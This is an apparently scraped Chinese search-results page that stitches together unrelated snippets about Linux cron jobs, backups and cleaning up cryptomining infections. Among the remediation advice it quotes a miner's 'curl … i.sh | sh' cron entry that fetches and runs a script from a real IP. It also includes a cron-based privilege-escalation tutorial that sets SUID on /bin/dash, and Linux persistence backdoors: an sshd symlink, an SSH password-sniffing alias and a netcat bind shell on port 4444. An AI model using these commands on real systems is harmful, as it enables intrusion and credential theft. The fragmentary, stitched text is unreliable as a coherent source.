重启发现所有备份包和脚本都清除的问题 之前由于backups权限问题,我将备份包发送到/tmp目录下, 重启电脑时,linux自动清除/tmp文件夹下的内容 原因是tmp是一个特殊的文件夹,系统会自动清理...定时备份 添加定时任务,每天凌晨6点执行gitlab备份 # 仇飞鸿编辑于2019-5-30 添加定时任务,每天6点,自动执行将旧服务器上的gitlab备份操作 0 6 * * * root...密钥配对 创建authorized_keys文件 当第二步将旧服务器上的id_rsa.pub.A 文件copy到新服务器的目录/root/.ssh ?.../sbin/service cron restart 旧服务器上的操作已结束,完成了自动将旧服务器上的gitlab备份和自动将gitlab备份包scp到新服务器上 自动恢复新服务器上的gitlab备份包...# 仇飞鸿编辑于2019-5-30 添加定时任务,每天6点,自动执行将旧服务器上的gitlab备份>操作 0 6 * * * root /opt/gitlab/bin/gitlab-rake
,直接暴露于公网。...,这是在感染矿马的机器上常见的一种现象,我们可以借助chattr工具清除文件的特殊权限属性,再对文件进行修改操作。...zhihuatnail.so无法清理的原因是存在文件特殊权限,因此清除其特殊权限,再进行删除操作就搞定了。...chmod +x zhihuatnail.so // 赋权后,即可正常执行 其他恶意文件的清理就不附图了,一次性全部清理 rm -rf /tmp/javax/...---- 总结一下 一、config.sh文件的特点是不会将定时任务写入crontab -l中,而是通过/var/spool/cron/root 等作为定时脚本,向矿池定时curl更新挖矿文件,更新待进程起来后
屏蔽host、删除病毒文件、删除定时都是治标不治本的办法,好在我们有定期备份镜像的习惯,找到最近的一次备份,然后还原,最后升级jenkins版本。 ...然后定时器执行,先做自我保护,再清除其它挖矿程序或病毒还有netstat这样的工具,接着按CPU型号,匹配下载对应watchdogs(看门狗)并运行,然后检查ssh免密文件,如果有配置免密机器,直接登录感染...,最后清除日志和混淆文件修改时间。...但这的前提是root权限,如果jenkins是以root启动的,那么就获得了root权限。 手工脱毒 脱毒的原理就是找到病毒文件然后删除掉。...进入磁盘后,可以看下最近修改的文件,一般都能看到,主要俩文件,一个是病毒,一个preload.so,删除掉,然后清除定时器文件,再开机
/var/spool/cron #-R递归处理,解锁/var/spool/cron目录下的所有文件及子目录 chattr -i /etc/crontab 对文件进行加锁 chattr -R +i /var.../sysupdate & else echo "root runing....." fi 再对/etc/下的病毒文件进行加锁,并对/tmp/路径下的病毒文件进行解锁,如下:、 chmod 777 /etc...-i /tmp/update.sh* 相关解锁动作完成后会在tmp路径再次进行etc路径下的操作,操作完成后,会在此对tmp路径下的病毒文件进行加锁操作,这里不在列举,可参照上述信息。...痕迹擦除 完成上述操作后会删除已有规则,并新建相关规则,清除历史命令操作和清除相关日志信息,如下: iptables -F #清除预设表filter中的所有规则链的规则 iptables -X #清除预设表...处置 文件确认 /etc目录文件发现sysupdate、sguard等文件 ? /tmp路径未发现文件 ? 启动项确认 通过对启动项进行查看,未发现启动项信息,如下: ?
前两个位置直接就在r88.sh这个文件中暴露了出来: ? 要清除该木马需要清除三个位置所有的定时任务,要不然该木马还会死灰复燃,重新被启动挖矿。...木马查杀 1)尝试杀掉bashd与bashe进程以及root.sh/rootv2.sh/lower.sh/lowerv2.sh与r88.sh这些shell进程 2)清除掉/tmp目录下木马释放的文件:/...tmp/bashd、/tmp/bashe、/tmp/root.sh、/tmp/rootv2.sh、/tmp/r88.sh、/tmp/pools.txt、/tmp/config.json等 3)清除3个位置的定时任务...:/var/spool/cron/root、/var/spool/cron/crontabs/root以及/etc/cron.d 对应的自动查杀脚本如下: #!....sh /tmp/pools.txt -r rm /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.d/root done
然后我们会将一些文件备份到存储库。最后,我们将配置一些文件,另其可以自动执行备份以获取每小时快照,并在必要时自动精简旧快照。...如果您需要连接到非标准端口上的服务器或通过不安全的HTTP连接,请在URL中包含类似于如下的信息:s3:http://example-server:3000/example-bucket。...使用上一步列表中的快照ID,我们将恢复的文件发送到一个新目录/tmp/restore: $ restic restore 427696a3 --target /tmp/restore restoring...任何不符合策略的备份都将从存储库中清除。 我们将使用cron系统服务,每小时运行一次备份任务。首先,打开用户的crontab: $ crontab -e 系统可能会提示您选择文本编辑器。...我们使用restic二进制文件的完整路径,因为cron服务不会自动查找/usr/local/bin命令。同样,我们明确地列出主文件夹路径/home/sammy而不是使用~快捷方式。
文章目录 生猛干货 概述 命令行小技巧 history命令来查看曾经运行过的命令 history中显示命令的执行时间 清除history 获取吃掉你磁盘空间的最大的5个文件 获取一个文件的详细状态信息...随机显示一个man手册页 删除大文件 复制文件到多个目录 在多个 Linux 服务器上运行相同命令 在指定时间关闭计算机 用一个命令创建目录树 假设你要创建一个类似于下面很长的/复杂的目录树。...执行之前的命令 在 Linux 中锁定或隐藏文件或目录 在 Linux 中检查单词拼写 列出所有 Shell 内置命令 如何在不使用Cron的情况调度Linux下的任务 如何不使用clear命令清空终端的内容...,Tab键功能不能用 echo > ~/.bash_history #清除当前用户所有记录到文件里的记录 history -c #清楚所有历史纪录,不能清除文件里的 history -d {n}...当我们需要调度一个任务时,我们会使用Cron,但你知道我们在不使用Cron的情况也可以调度一个在将来时间运行的任务吗?
#终止wnTKYg进程 终止以ddg*为前缀的进程 删除/tmp/ddg* 为前缀的文件 删除/tmp/wnTKyg文件 &&先成功执行前面的命令在执行后面的命令 rm -rf /boot/grub/deamon...#删除/tmp下的凡是index_bak的文件 **为通配符 rm -rf /tmp/*httpd.conf* rm -rf /tmp/*httpd.conf rm -rf /tmp/a7b104c270...#创建文件,此处是上面输出的指定文件 touch -acmr /bin/sh /var/spool/cron/crontabs/root touch -acmr /bin/sh /etc/cron.d/...替换相应的落地文件。...# 0x03 清除方案 1.清理定时任务 (先清理定时任务,再删除挖矿病毒本体,防止再生) ``` # 包括但不限于 /etc/crontab /var/spool/cron/root /var/spool
:8000/i.sh | sh" >> /var/spool/cron/crontabs/root ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm...$(uname -m) -o /tmp/ddgs.3013 fi chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013 ps auxf | grep -v grep |...print $2}' | kill 处理方法: 1.删除 crontab -e 中 */5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh 2.清除...,修改 Redis 的默认端口6379 配置认证,也就是AUTH,设置密码,密码会以明文方式保存在Redis配置文件中 2.配置rename-command 配置项 “RENAME_CONFIG”,这样即使存在未授权访问...requirepass ##获取当前密码 config set requirepass "yourpassword" ##设置当前密码,服务重新启动后又会置为默认,即无密码; 永久生效方法为,打开redis配置文件
写在前面的话 今天给各位渗透测试同行们提供一种Linux提权方法,在这篇文章中,我们将介绍如何使用Cron Jobs来实现Linux下的权限提升,并获取远程主机的root访问权。...Cron Jobs能做什么? Cron Jobs可以在服务器端完成一系列计划任务(设定时间自动执行命令等等),一般它主要用于执行系统管理员任务,例如数据备份或清理缓存目录等等。...文件重写 设置简陋配置的Cron任务 目标:在crontab的帮助下,设置一个新的任务来运行目标Python脚本,并清除指定目录中的全部数据。...启用/bin/dash的SUID,使用nano打开cleanup.py ,并将其中的“rm -r /tmp/*”替换成下列内容: os.system('chmod u+s /bin/dash') ?...然后每隔一分钟将/html目录中的tar文件备份到/var/backups中: nano /etc/crontab */1* * * * root tar -zcf /var/backups/html.tgz
发现这个wnTKYg 的程序在/tmp 下。 处理挖矿病毒 直接kill掉这个进程,发现没到2分钟,又发现他重启了。于是猜是否有守护进程存在。 继续观察top以及和/tmp路径下的文件进行对比。...发现了有ddg.2003、ddg.2004 两个陌生的程序。于是判断这两个可能为守护进程文件。清除后发现隔几分钟又会重新启动。我猜想可能会有定时任务。...查看文件 我先看了下root文件 /var/spool/cron/crontabs文件夹下的root文件 都做了一个定时任务,向一个固定的IP下载一个i.sh的脚本....因为我不知道这个程序是不是通过扫描/var/spool/cron/crontabs 这个路径,来创建定时任务的,所以没有把它删除掉,只是禁掉了。...结果 我再kill掉这个病毒的进程和守护进程,并且把/tmp路径下的对应的程序删除掉。 观察了top一段时间,发现此病毒暂时没有复发。
/bin/dhpcd -o ca.minexmr.com:4444 -B >/dev/null 2>/dev/null exit 0 清除竞争对手 攻击者要努力清除其他攻击者,最大化独占失陷主机的资源...该目录是一个 tmpfs 文件系统,其中的文件保存在虚拟内存中,写入该位置不会在文件系统中留下痕迹。 攻击者会查询系统上消耗资源最多的进程、占用内存最多的进程,将其全部终止,确保自己的资源够用。.../etc/cron.hourly/gcc.sh /etc/cron.hourly/cron.sh /etc/cron.hourly/gcc4.sh/lib/libudev.so 紧接着清除掉如 XorDdos...、Tsunami 和 aliyun.one 等其他攻击者的恶意进程(如 Xm64、Ceurnad、/tmp/samba 和 Sc64u)、恶意文件与定时任务。...过滤掉已知的文件,如 dump、docker、mount 等,留下可能是其他攻击者的挖矿程序的文件列表。
Containment把所有可能受影响的系统都隔离,包括上述known_hosts 发现600多台主机。Eradication根据上面的清除清除所有受影响的主机。...ls 排查 可读写执行目录 ls –alt /tmp/; ls -alt /var/tmp; ls -alt /dev/shm 排序 $PATH 环境变量下的目录的文件,比如 ls -alt /bin...运行cat /proc/$PID/cmdline查看进程执行的命令及参数 通过file命令查看恶意程序文件类型,比如:file /tmp/.sh 如果是ELF文件,可以通过strings查看ELF里带的字符串...,可能会泄露一些信息,比如 stirngs /tmp/.elf 如果碰到恶意程序被删除,可以通过内存转储的方式从内存中导出恶意程序 从内存拷贝恢复被删除文件 cp /proc/[pid]/exe /tmp...–list service –status-all 定时任务 重点查看以下罗列的目录及文件内容 /etc/crontab /etc/cron.d/* /etc/cron.daily/* /etc/cron.hourly
尝试连接Redis并执行预置在.dat文件里的利用命令将Redis的数据文件修改为/var/spool/cron/root,然后通过在Redis中插入数据,将下载执行脚本的动作写入crontab任务 通过脚本实现以上的相关行为...这部分主要是修改系统的配置,开头两行为关闭SELINUX;然后清空/var/spool/cron,进而判断系统DNS服务器是否存在8.8.8.8,没有则添加;接着清空系统tmp目录和删除相关文件;同时清空系统缓存...最后就是收尾工作,清除相关日志和命令执行历史,同时在脚本退出的时候会触发脚本一开始用trap预置的动作,会做删除操作,删除相关文件和脚本自身(rm -rf m* .cmd tmp.* .r .dat $0...,一些环境的预处理: 关闭SELINUX 增加8.8.8.8的DNS 清空tmp目录 清空系统缓存 修改系统资源限制 痕迹清除 利用trap预置动作好在脚本执行完成后删除相关文件和脚本自身 重复清除相关登录等日志和命令执行历史...tmp目录,对系统无影响,可忽略 启动了挖矿进程和pnscan扫描感染,进程:.gpg、pnscan,直接kill 还包含了一些中间文件,虽然脚本包含相关删除操作,但建议还是全局查找确认: .mxff0
(Linux下是没有ntp服务的,有的是ntpd服务) 附发现的伪造的/etc/init.d/ntp文件内容: #!...,然后rm -f /usr/sbin/ntp /opt/KHK75NEOiq33 删除病毒文件 编辑 /var/spool/cron/crontabs/root和 /var/spool/cron/root...,清除植入的cron计划任务 此外,还要检查以下几处: 1、是否有新添加的账户 【grep '/bin/bash' /etc/passwd】 2、查看其他可登陆的账户下是否也有恶意的计划任务 3、检查是否有新添加了...sudo账户 当然,这是台线上的服务器,为了防止还有残留的病毒文件,最好我们还是先备份下数据,然后重装了系统。.../bin/bash #记录原始的执行文件的md5sum if[[ !
bash ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oport=12345 连接命令 ssh root@192.168.92.128 -p 12345 ssh server...发送到目标上 /root/.ssh/authorized _keys ~/.ssh 默认权限为700 ~.ssh/authorized _keys 默认权限为600 另外可以通过touch修改时间戳, 让新上传的文件时间戳改为旧文件时间戳...-o /tmp/sshpwd-`date +%d%h%m%s`log -e read,write,connect -s2048 ssh' 加载配置文件让插入的别名配置生效: source ~/.bashrc...: /var/spool/cron/用户名 用户自定义的设置 /var/log/cron cron服务的日志文件 /etc/crontab cron服务配置文件 vim 后门 前提条件.../bin/bash nc -l -v -p 4444 -e /bin/bash 2>/dev/null &/bin/uname $@ 其他可执行程序也可以尝试通过这种方式进行劫持, 是否成功取决于原可执行文件所在目录之前的其他
cat /etc/cron.d/ cat /etc/cron.daily/ cat /etc/cron.hourly/ cat /etc/cron.weekly/ cat /etc/cron.monthly...清除预加载so 通过配置/etc/ld.so.preload,可以自定义程序运行前优先加载的动态链接库,部分木马通过修改该文件,添加恶意so文件,从而实现挖矿进程的隐藏等恶意功能。...清除SSH公钥 挖矿木马通常还会在~/.ssh/authoruzed_keys文件中写入黑客的SSH公钥,这样子就算用户将挖矿木马清除得一干二净,黑客还是可以免密登陆该主机,这也是常见的保持服务器控制权的手段...删除未授权进程对应的文件 13.png 还可以通过如下命令排查近期新增的文件,清除相关木马 find /etc -ctime -2 (这里指定目录为/etc,获取近2天内的新增文件) lsof -c...Virustotal进行检测,或者计算出文件对应的md5,使用md5去Virustotal进行查询;若文件已被删除,可执行`cat /proc/$PID/exe > /tmp/t.bin`将进程dump
cat /etc/cron.d/ cat /etc/cron.daily/ cat /etc/cron.hourly/ cat /etc/cron.weekly/ cat /etc/cron.monthly.../ cat /var/spool/cron/ 清除启动项 除了计划任务,挖矿木马通过添加启动项同样能实现持久化。...检查/etc/ld.so.preload(该文件默认为空),清除异常的动态链接库。可以执行> /etc/ld.so.preload命令进行清除。...清除SSH公钥 挖矿木马通常还会在~/.ssh/authoruzed_keys文件中写入黑客的SSH公钥,这样子就算用户将挖矿木马清除得一干二净,黑客还是可以免密登陆该主机,这也是常见的保持服务器控制权的手段...Virustotal进行检测,或者计算出文件对应的md5,使用md5去Virustotal进行查询;若文件已被删除,可执行cat /proc/$PID/exe > /tmp/t.bin将进程dump到特定目录
,把脚本内容全部复制进去,然后根据提示填写自己的账号密码和学校服务器IP文章整合在旧云博客name="你的账号"passwd="你的密码"nasip="你的学校服务器IP"支持网页认证的可以打开天翼校园网页...ps: 由于Padavan在重启时会清除除了/etc/storage/以外的全部目录文件,所以非常建议将脚本放进/etc/storage/下,然后进入路由器设置页面-高级设置-系统管理-配置管理,找到保存内部存储到闪存...随后应用设置,然后重启路由器,看看是否能直接上网步骤四进行防掉线的Cron 守护程序设置(请把脚本放入路由器的/etc/storage/目录下再进行操作,原因看第二步的解释)如果你仅仅使用了以上几步,那么相信你会发现在经过一段时间无人使用后路由器掉线了...,需要在其他设备上重新认证一次才可使用,那么我们就进行一个防止掉线先打开路由器设置页-高级设置-系统管理-服务 找到"启用Cron 守护程序",如果是关的请先打开。...,最前面的1是指每1分钟,可以自己修改成其他的 (如换成20就是每20分钟执行一次) 后面的路径依旧是指向你的脚本路径,上面我也说过除了/etc/storage/下其他目录重启会清除文件,所以还请不要自作主张乱放脚本然后修改路径
通过对kdevtmpfsi木马分析,发现该木马存在守护进程无法直接删除,需首先清除其守护进程kinsing,再对kdevtmpfsi木马进程及其相关恶意文件进行清除。...重启业务后发现kdevtmpfsi木马再次启动,对其进程进行追踪发现挖矿木马感染了weblogic启动脚本文件,只要weblogic应用属于启动状态,木马会持续下载运行,清除weblogic中恶意代码和恶意文件后...1.3 应急处置 针对kdevtmpfsi木马清除恶意程序文件/tmp/kdevtmpfsi、/var/tmp/ kdevtmpfsi、/etc/spool/cron/root、/home/weblogic...针对startMiner新型变种挖矿木马,清除以下文件: ?...经过与应用开发商核实,黄框以外的均为恶意文件。临时备份删除后并将startWeblogic.sh中恶意代码清除,后续建议重新校验weblogic应用文件的完整性,确保无其他未发现的挖矿木马残留文件。
领取专属 10元无门槛券
手把手带您无忧上云